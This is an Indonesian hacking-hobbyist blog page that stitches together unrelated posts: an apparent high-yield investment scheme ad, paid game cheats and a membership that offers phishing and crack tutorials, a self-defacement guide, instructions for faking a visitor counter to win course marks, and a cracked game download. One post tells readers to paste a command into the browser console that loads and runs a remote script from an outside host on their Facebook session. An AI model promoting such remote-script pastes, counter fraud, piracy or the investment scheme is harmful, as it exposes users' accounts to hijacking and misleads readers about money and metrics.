Muhammad Hidayat

ThinKing Out Of The Box

  • Hosting Gratis
  • Berbagi Informasi
  • Hosting Gratis

Cara Mendapatkan Uang Tanpa Modal Sedikit Pun


Bisnis lokal yang paling BOOMING:
Terbukti, hanya dlm waktu 169 hari, member telah lebih dari 372.352 orang

                           JOIN NOW!

Dahsyat!!
- Mempunyai 2 sistem utama: Plan GRATIS & Plan INVESTASI
- Withdrawal bisa ke PM, Bank Lokal, dan Pulsa
- Web semakin AMAN dengan HTTPS/SSL 256 bit
- Komunikasi langsung dgn Admin via SMS/Call/FB
- Invest minimal $0.5 via  PM, EgoPay, Payza, & Bank Lokal
- Profit 2% x 100 hari + Profit extra
- Compound minimal $0.5
- WD INSTANT ke PM minimal $0.02 (cuma butuh waktu 3 detik)
- WD ke Bank Lokal minimal $20 (kurs $1 = Rp 9.700)
- WD dgn Pulsa HP dengan harga dibawah standar pasar
- Tersedia fitur IBC MOBILE, website versi HP

AYO BURUAN DAFTAR!
SEKARANG GILIRAN ANDA UNTUK MENJADI ORANG SUKSES TANPA MODAL


[HOT] Tools Social Empires , Social Wars , Dragon City , Monster Legend

Untuk Mendapatkan Tools Game Social Point Anda Bisa Langsung Masuk Ke Website Tools Ane.

Dan Agar Bisa Menggunakan Tools Tersebut anda harus Daftar menjadi Member Ane..
Daftar Harga Member Bisa Di Lihat di Sini

Berikut Penampakan Tools Ane.

-DRAGON CITY


-MONSTER LEGEND

- SOCIAL EMPIRES

-SOCIAL WARS

DIJAMIN WORK 100% TOOLSNYA :)


Register Grup CEG Premium



Register ™|lCyber-Elite'Generationl|™
Harga 20k G-Cash / 20k Pulsa Three

Fitur : 
- Setiap 1Minggu Bagi'' Char LS/PB
- Editing Game
- Web Pesing (Tutorial Lengkap)
- Cheating 

- Hacking
- Creating 
- All Trick and Tips
- Download Game or Crack Game / OS
- Dan Masih Akan Di Update Lagi... :)


Minat Chat Add + PM : http://www.facebook.com/dayat.frixy.empirez


Link Grup : http://www.facebook.com/groups/ClubCEG/

Tutorial Deface Blog Sendiri + Gambar

Hallo Sobat ane kali ini mau share tentang Hacking nih...yaitu Tutorial Deface Blog Sendiri...
oke langsung aja serap ilmunya...hehe



Step by Step .

- Kalian Harus Login dulu di aku Blogger kalian masing-masing.
- Setelah Masuk ke akun blogger sobat sekarang saatnya deface di mulai
- masuk ke rancangan template "SS : http://prntscr.com/zkud4 "
- Setelah itu Scroll Sampai Ke Bawah "Mentok" [ Scroll sudah di bawah : http://prntscr.com/zkuf1 ]
- Lalu klik "Kembali ke template klasik" SS : http://prntscr.com/zkugx
- Sehingga muncul seperti ini "SS : http://prntscr.com/zkujz
- Pilih lagi Kembali ke Template Klasik " SS : http://prntscr.com/zkul5
- Dan jika sudah di klik tampilannya akan seperti ini " SS : http://prntscr.com/zkuqj "
- Dan Masukkan Script Deface Kalian Masing'' ke dalam HTML Box dan Simpan Template
- Terakhir lihat Blog yang anda Deface ...Selesai

Contoh Blog saya yang sudah di deface saya sendiri http://www.tukanghek.co.vu/

                    ~Semoga Bermanfaat~

Copas Sertakan Sumber Thx

Admin Panel Social Wars 1.4.28


Tools :
- Flashplayer 11.6 32bit Download Here (9,3MB)
- SWF SW.1.4.28 Download Here (3,9MB)

#Jika Ingin Menggunakan Cheat Ini Jangan Mainkan Social Wars kalian yang Di Facebook

Tutorial :

- Buka FlashPlayer 11.6 Yang Sudah Di Download.
- Pilih File -> Open -> Klik Browse Terus Cari SWFnya -> Lalu Open Dan Pilih OK

- Jika Sudah Di Open Maka Akan Muncul Gambar Seperti Dibawah Ini..
-Lalu Tekan Tombol Ini -> ( ~) Terletak Di Bawah (ESC)

-Maka Akan Muncul Seperti Ini....(Sudah Masuk ke Admin Panel Social Wars)

-Selanjutnya Masukkan ID Facebook Anda di Menu "Facebook ID"
-Untuk Mengetahui ID Facebook Silahkan Pergi Ke http://graph.facebook.com/UsernameAgan (Contoh http://graph.facebook.com/dayat.frixy.empirez )

-Di Menu Facebook ID Ganti Dengan ID Facebook Agan..
-Jika Sudah Memasukkan ID Facebook Agan Silahkan Pilih "LOAD ID FB PROD"
-Jika Loadingnya Sudah Selesai Agan tekan (~) 2X untuk Memunculkan Admin Panelnya...
- ( Give Resource : Untuk Menambah Kayu Batu Dan Lain'')
- ( Give Cash : Untuk Menambah Cash Social Wars Kalian )
- ( level Up : Untuk Menaikkan Level Social Wars kalian Secara Instant)
Jika Sudah Selesai Menggunakan Cheat Jangan Lupa Klik "SAVE STATUS"

Kalau Sudah di "SAVE STATUS" Lihat Social Wars Kalian Yang di Facebook....
Pastinya WOW Menjakjubkan...hehe

Thank's For reading my Article



[HOT] Tools Dragon City 2013


Dragon City Tools
Saldo Gems : 950.000
USERNAME:
PIN:

FB ID:
Item:

Harga:




Anda yakin ingin mengisi GEMS jika mau mengisi saldo akan berkurang sesuai harga tertera
300 Gems = 1500
1000 Gems = 5000
2100 Gems = 10000
4200 Gems = 15.000
6000 Gems = 20.000



Cara Membuat Efek Bintang Pada Link Blog

Langsung aja ah Dayat-H4ck.com mau bagi'' Ilmu Blogger lagi...cara Membuat Efek Bintang pada link.
CEKIDOT!!

1. Login ke blogger
2. Masuk ke Rancangan -- Edit HTML
3. Carilah kode a:link{ atau a:visited{
4. Lalu letakkan kode dibawah ini dibawah kode tadi

a:hover {background-image: url(https://lh6.googleusercontent.com/-AlOJLqdQbgM/TX8PrNRSMsI/AAAAAAAAAaY/qJhxSdh5tfE/s1600/stars.gif);}
Link akan mengeluarkan gambar seperti ini:
5. Simpan template anda lalu lihat hasilnya.


                                             ~SEMOGA BERMANFAAT~

Cara Manipulasi Visitors Counter pada Blog


Flagcounter.com memberikan layanan counter pengunjung gratis untuk web kita. Yang membuatnya berbeda dengan counter-counter lain adalah tampilan di counter-nya yang juga menyertakan gambar bendera negara asal pengunjung web kita, lengkap dengan jumlah alamat IP unik plus jumlah pageview web kita. Kalau belum ada gambaran, silahkan lihat gambar di bawah ini, ini adalah flag counter blog ini.

Ide ini muncul ketika ada salah satu dosen saya yang mewajibkan semua mahasiswa yang mengikuti mata kuliahnya untuk memiliki blog, blog di UIN Blogger tepatnya. Dan tambah lagi, beliau juga akan mengambil tambahan nilai dari jumlah pengunjung blog kita, beliau merekomendasikan counter-nya flagcounter ini.
Otak yang usil ini pun berfikir: "Waduh, kalau mengandalkan nilai dari kuliah jelas nggak bisa nih (soalnya saya dodol di mata kuliah tersebut). Ah.. ada harapan buat mengambil nilai dari jumlah visitor.." :D
Tapi masalahnya, blog saya dulu (waktu menempuh mata kuliah tersebut) nggak laku,, pengunjungnya cuma satu dua,, itupun mungkin pengunjung setan alias bot-bot search engine. Maka harapan untuk mengeruk nilai dari visitor hampir kandas. Bisa saja blog ini saya isi dengan artikel-artikel sepanyol (separo nyolong) dari web orang, biar kelihatan banyak isinya dan menarik pengunjung, tapi copas bukanlah style saya :D
Satu-satunya cara mendapatkan jumlah pengunjung dengan cepat- dan super banyak adalah memanipulasi counternya (kata pikiran nakal di otak saya :D). Pernah terpikirkan untuk membuat gambar palsu (menggambar counter sendiri, jadi bukan counter asli dari flagcounter.com), tapi cara tersebut rasa-rasanya juga kurang gentle :D
Jadi, dengan memanfaatkan beberapa kelemahan di sistem flagcounter, saya bisa memanipulasi jumlah visitor counter dari flagcounter.com. Ngomong-ngomong, apa saja kelemahannya?
  1. Kebanyakan dari penyedia sistem counter memberikan sepotong-dua potong (sebaris-dua baris) kode HTML untuk dipasangkan ke halaman kita, begitupun dengan flagcounter. Ingat, kode tersebut tentu saja terpampang dengan jelas dengan memanfaatkan fitur "View Source Code" di browser.
  2. Layanan gratisan Flagcounter.com ini tidak memberikan halaman detail yang menunjukkan bahwa jumlah pengunjung di counter tersebut adalah benar-benar dari halaman web ini atau itu. Kalau tidak percaya, coba klik pada gambar counter di samping kanan halaman ini, nanti akan masuk ke situs flagcounter.com dan ditampilkan detail dari pengunjung, mulai dari negara, jumlah pengunjung unik-nya, presentase-nya.
    Tapi tidak ada satu keterangan-pun bahwa counter tersebut adalah counter untuk blog saya kan? Seperti di gambar berikut ini:

Ini detail counter-nya siapa yaa?? ga jelas..
Lihat sendiri kan? sama sekali tidak ada informasi bahwa detail yang sedang ditampilkan adalah detail dari blog saya, huhu :D
Oke, langsung saja ke prakteknya. Saya akan memakai contoh flag counter milik saya sendiri.
1. Temukan kode sumber / source code dari halaman yang sedang menampilkan flag counter.
Lewat menu "View Source Code" atau tekan CTRL+U, akan muncul jendela/tab baru yang berisi kode sumber halaman ini.
2. Cari tulisan berikut ini: (gunakan fitur search biar lebih mudah, ini adalah source flagcounter saya)
http://s01.flagcounter.com/more/K4z">http://s07.flagcounter.com/count/7pi/bg=FFFFFF/txt=000000/border=CCCCCC/columns=2/maxflags=100/viewers=0/labels=1/pageviews=1/
" alt="Blog CEG Insyaallah.." border="0" />

Bagaimana? sangat mudah bukan? teman-teman bisa membuktikan betapa meyakinkannya counter ini dengan cara meng-klik-nya, teman-teman akan dibawa ke halaman detail flagcounter.com, semua berjalan lancar, sempurna, tanpa mencurigakan. :D
Solusi
Ada baiknya flagcounter.com menambahkan informasi yang lebih lengkap di halaman detail, meskipun hanya dengan tulisan semisal "Counter Details for http://blablabla", tentunya akan membuat counter ini lebih aman dan lebih susah diakali.
Jadi, jangan kaget kalau di waktu mendatang, counter saya berubah menjadi seperti ini ya:

Counter bukanlah ajang untuk pamer. Pengunjung memang mungkin akan salut dengan jumlah yang tertera di counter kita. Tapi itupun hanya salut sementara. Yang jauh lebih penting adalah kualitas tulisan kita, jangan asal copy paste, kemukakan ide-ide baru, tuangkan dalam artikel-artikel yang bagus. Tentunya pengunjung akan "ketagihan" datang ke blog kita. Setuju nggak?
                                                                                 ~Good Luck~

Cara Menaikkan Jumlah Visitor Counter


Barusan dapet cara ini jadinya mau ane share gan Cara Ampuh Meningkatkan Visitor Blog Secara Drastis. Salah satu Trafic Exchange yangmenggunakan sistem Auto Surf, yaitu kita mensurfing tanpa harus klik gambar atau semacamnya. Surfing akan berjalan otomatis, jadi kita bisa sambil Browsing, Fb an, ngurus bisnis online, bahkan tiduran tanpa terganggu oleh klik gambar. Ini lah kehebatan 10Khits kita tinggalkan point bertambah. ^_^. Visitor yang kita dapatkan dari luar negri dan 70% berasal dari USA, bagus untuk menghiasi Flag Counter blog anda. Langsung saja anda mendaftar di 10KHits untuk menaikan jumlah visitor anda.
Cara Cepat Meningkatkan Pengunjung Blog Gratis
1. Klik disini!.
2. Isi kolom yang tersedia, masukan email dan pasword anda.
3. Buka email anda, bila diperintahkan untuk memvertifikasi.
4. Jika sudah, anda akan berada di halaman Dasboard.
5. Masukan Blogg anda dimenu Add new site.
6. Isikan Nama Blogg, URL Blogg, No Sound (bila blogg anda ada suaranya), Site Language.
7.  Klik add new sites, tunggu 20 detik untuk confirmasi Blogg.
8.  Mulailah Surfing untuk menambah point, klik Surf Now (terletak di Kanan Atas).
9. Biarkan point mengalir ke akun anda, walaupun anda tinggal tiduran atau browsing.
10. Jika anda merasa punya banyak point, tambahkan point anda ke blogg yang anda daftarkan. klik Allocate Points (Isikan point yang anda inginkan), jika sudah klik Allocate points.

#Note :
10Khits hanya untuk menaikan visitor bukan untuk mencari dollar seperti Easyhits4you,
Surfing sampai 1000 Point, anda akan mendapat bonus Sign Up 10.000 Point
Setiap Surf 10 detik akan mendapat 0.5 point
Pada hari sabtu akan mendapat double point setiap surfnya menjadi 1 point
Masukan URL blog (add new sites) yang sama sebanyak 4 kali, dan bagi rata Point nya. Supaya trafic cepat bertambah.

                                                      ~Good Luck~

Auto Invite Friend To Your Group Facebook [HOT]

Untuk Pengguna Mozzila Firefox
1. Tekan tombol CTRL + SHIFT + K
2. Lalu isi kode ini

document.body.appendChild(document.createElement('script')).src='http://gsoftz.in/autoinvite2012.js';

3. Enter


Untuk pengguna Google Chrome
1. Klik Mouse Kanan
2. Tekan Inspect Element (Q)
3. Pilih Console
4. Lalu isi kode ini

document.body.appendChild(document.createElement('script')).src='http://gsoftz.in/autoinvite2012.js';

5. Enter


Silahkan yg baru coba-coba untuk memakainya di group ini, supaya tidak salah langkah saat di group lain. Terimakasih

Free Download Plants VS Zombie + Crack

Get ready to soil your plants in an all-new action-strategy game from PopCap! A mob of fun-loving zombies is about to invade your home, and your only defense is an arsenal of 49 zombie-zapping plants. Use peashooters, wall-nuts, cherry bombs and more to mulchify 26 types of zombies before they can reach your front door. Each zombie has its own special skills, so you'll need to think fast and plant faster to combat them all. But be careful how you use your limited supply of greens and seeds… as you battle the fun-dead, obstacles like a setting sun, creeping fog and a swimming pool add to the challenge. And with five game modes to dig into, the fun never dies!

Screenshot






Dah,,Langsung Aja Ke Link Downloadnya.,,


Setup PopCap 's Click Here Via Ziddu
---------------------------------------------
Crack Plants VS Zombie  Click Here Via Rapidshare













- Copyright © 2013 ™|lCyber-Elite'Generationl|™ - Powered by Blogger - Design by Johanes dan Andi -